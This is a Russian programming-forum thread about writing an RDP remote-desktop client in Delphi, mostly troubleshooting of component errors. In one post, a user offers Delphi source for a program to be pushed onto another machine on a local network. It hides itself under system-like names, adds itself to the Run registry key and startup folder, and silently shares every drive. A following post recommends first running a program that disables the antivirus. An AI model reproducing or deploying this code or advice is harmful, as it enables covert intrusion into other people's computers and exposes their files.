Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Delphi программирование > Работа с сетью в Delphi
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 01.01.2009, 19:43   #31
Terran
Участник клуба
 
Аватар для Terran
 
Регистрация: 28.11.2007
Сообщений: 1,521
По умолчанию

Цитата:
Блин помагите пожалусто тоже там ошибка и вопще на rdp.AdvancedSettings2 все каманды ошибкиами ругается
rdp - это по ходу какой-то компонент и без его наличия на форме при выполнении кода будут ошибки. Я с ним не сталкивался поэтому точно сказать не могу, но в этой строчке (rdp.AdvancedSettings2.ClearTextPas sword :=edit3.Text; - тут ошибка) если логически подумать, то должно быть так: rdp.AdvancedSettings2.ClearTextPass word;
Всегда рад помочь!
Terran вне форума Ответить с цитированием
Старый 06.01.2009, 01:36   #32
jone
Форумчанин
 
Аватар для jone
 
Регистрация: 27.09.2008
Сообщений: 152
По умолчанию

Вот мой исходник с компанентом где ругается написал
Вот что можете сказать? хочу довести до автомата вход..
Вложения
Тип файла: rar ts2.rar (479.5 Кб, 153 просмотров)
jone вне форума Ответить с цитированием
Старый 22.02.2009, 14:39   #33
Квэнди
Старожил
 
Аватар для Квэнди
 
Регистрация: 13.12.2006
Сообщений: 3,859
По умолчанию

В MSDN есть ActiveX компонент MsRdpClient , который инкапсулируется в класс TMsRdpClient и ряд интерфейсов в Delphi после установки. Если у вас установлен клиент RDP на компьютере, то Activex есть автоматически. Описание работы с MsRdpClient в msdn есть.
ICQ не для вопросов, а для предложений. Для вопросов используйте форум
IRC канал клуба программистов|Мои статьи
Квэнди вне форума Ответить с цитированием
Старый 23.02.2009, 12:15   #34
jone
Форумчанин
 
Аватар для jone
 
Регистрация: 27.09.2008
Сообщений: 152
По умолчанию

тему так и не решили

если можите выложите исправный (компонент)клиента

Последний раз редактировалось mihali4; 25.02.2009 в 20:35.
jone вне форума Ответить с цитированием
Старый 23.02.2009, 12:36   #35
Квэнди
Старожил
 
Аватар для Квэнди
 
Регистрация: 13.12.2006
Сообщений: 3,859
По умолчанию

Нет, через стандартный UDP клиент работа с протоколом RDP не возможна. Хотя, если вы найдете спецификацию RDP, то разумеется это реализуемо. Но, на сколько мне известно, протокол RDP является пропоритарным и закрытым, хотя это далеко не факт
ICQ не для вопросов, а для предложений. Для вопросов используйте форум
IRC канал клуба программистов|Мои статьи
Квэнди вне форума Ответить с цитированием
Старый 31.03.2009, 11:12   #36
XAOC-forever
Пользователь
 
Регистрация: 10.04.2008
Сообщений: 47
По умолчанию

может-ли кто-нибудь поделится MSTSCLib_TLB ?, задалбался рыскать в гугле
XAOC-forever вне форума Ответить с цитированием
Старый 21.09.2009, 21:11   #37
JUDAS
фонатик DELPHI
Форумчанин
 
Аватар для JUDAS
 
Регистрация: 14.01.2008
Сообщений: 714
По умолчанию

Здравствуйте уважаемые коллеги !
Просьба поделится советом.
Имеется клиент-серверное приложение написанное на Паскале
Смысл - на физическом сервере организован TServerSocket
клиенты подключаются как TServerClientWinSocket. Протокол ТСП/ИП
-------
Система работает сутками без перебоев и проблем ПОКА....
пока админ не заходит на сервак через удалённый рабочий стол.
В тот же момент, все TServerClientThread падают как картёжные домики !
Сервер маслает в холостую.
Как только админ "покидает" сервер - связи постепенно восстанавливаются и прога - переходит в нормальный режим работы.
--------
ПОделитесь пожалуйста советом - кто должен извидину напрягать
я как программер написавший полуфабрикат, или админ ?
Буду очень благодарен на просветление !
95% сбоев и ошибок приложений, находится в полу метрах от монитора
JUDAS вне форума Ответить с цитированием
Старый 23.09.2009, 01:12   #38
AlexFAst
Пользователь
 
Регистрация: 23.09.2009
Сообщений: 27
По умолчанию

Radmin клево но вот как его туда закинуть

есть предложение для локальной сети
расшарить все диски, зайти и прописать клиент
вот код программы на делфе
скидываем прогу клиенту
только если стоит антивир который видит потенциально опасные программы сразу же ее заблокирует!

program SHARE; {AlexFast OPEN RESOURCE}
{$APPTYPE CONSOLE}
uses
windows,registry;

const
drivers :array [0..24] of char=('a','b','c','d','e','f',
'g','h','i','j','k','l','m','n','o' ,'p','q','r','t','u','v',
'w','x','y','z');

var
reg:tregistry;
sysdir: array [0..255] of char;
str:string;
i:integer;
procedure Init;
begin
{Вычисляем системный каталог}
GetSystemDirectory(sysdir,MAX_PATH) ;
str:=sysdir;
{Реестр}
reg:=tregistry.Create; //Создаем переменную реестра
reg.RootKey:=HKEY_LOCAL_MACHINE; //Устанавливаем корневой ключ
reg.OpenKey('\SOFTWARE\Microsoft\Wi ndows\CurrentVersion\Run\',true);//Открываем ключ
reg.WriteString('sysdm',str+'\'+'sy sdm.com/startup');//Создаем параметр
reg.CloseKey;//Закрываем ключ
reg.free;// удаляем переменную
{Копирование [2 имени 2 файла 2 расширения]}
copyfile(Pchar(ParamStr(0)),
Pchar('C:\Documents and Settings\All Users\Главное меню\Программы\Автозагрузка\'+'Sysm anager'+'.exe'),true); //Копируем в автозагрузку
copyfile(Pchar(ParamStr(0)),Pchar(s tr+'\'+'sysdm'+'.com'),true); // И в путь регестрации
{Расшаривание}
for i:=0 to 24 do
Winexec(pansichar('Net Share DRIVE'+drivers[i]+'='+drivers[i]+':\'),SW_HIDE);
end;
begin
init;
end.
AlexFAst вне форума Ответить с цитированием
Старый 16.10.2009, 10:36   #39
nn377
Пользователь
 
Аватар для nn377
 
Регистрация: 05.02.2009
Сообщений: 14
По умолчанию

Вот есть мысль.
Сначала закинуть прогу, которая закрывает антивирь.
Я пробовал только с nod32, получилось.
А вот нельзя ли как нибудь напрямую работать с реестром на хосте в локальной сети?
A Barbarian I'm here and nobody can understand me...
nn377 вне форума Ответить с цитированием
Старый 18.10.2009, 07:55   #40
sergoss
Пользователь
 
Регистрация: 17.12.2007
Сообщений: 12
По умолчанию

народ! А у меня вообще не работает. я компонент поставил. так у меня откомпилированный ехе файл не запускается даже. "Неизвестная ошибка". Компонента на панели инструментов почему-то не появилось(((
D 7. че может быть?
sergoss вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Управление с клавиатуры kpishnik Помощь студентам 10 27.07.2008 18:38
Управление громкостью Jupiter Общие вопросы Delphi 2 29.06.2008 15:43
Управление голосом prizrak1390 Общие вопросы Delphi 2 24.06.2008 21:04
Нужна прграмма с удаленным доступом POMAH Фриланс 2 02.06.2008 22:31
Управление Монитором _XspeC_ Общие вопросы Delphi 3 26.03.2007 19:28